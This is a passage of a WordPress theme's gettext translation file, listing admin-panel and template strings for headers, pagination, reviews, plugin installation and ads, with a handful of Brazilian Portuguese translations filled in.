backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "Mais resultados" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile " "device." msgstr "" #: backend/panels/heading.php:42 msgid "" "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the " "font values." msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: templates/parts.php:114 msgid "" "No found posts, Please add a new post for this query or change the block " "settings: " msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 #: includes/sidebars.php:124 includes/sidebars.php:134 #: includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the search results." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "Ops! Nada aqui" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "" "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config " "for the blog page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/single-post.php:586 msgid "" "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the " "default." msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/adblock.php:35 msgid "" "Our site is an advertising supported site. Please whitelist to support our " "site." msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design " "> Font Awesome\" if you use this font icon classname." msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML " "vulnerabilities." msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for " "setting up background, color and other settings." msgstr "" #: backend/panels/newsletter.php:21 msgid "" "Please update cover images to your own images after importing the theme demo." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 msgid "Pre-Packaged" msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "Leia mais" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "Leitura:" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:17 #, php-format msgid "" "Ready to publish your first post? Get started here." msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to Login for Guest Users" msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/sidebar.php:15 msgid "" "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "Remover" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "Redimensionador" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "Voltar a página inicial" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 #: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read " "documentation for further information." msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "Salve isso" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 #: searchform.php:18 templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "Buscar" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "buscar" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "Resultados da busca por: %s" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr 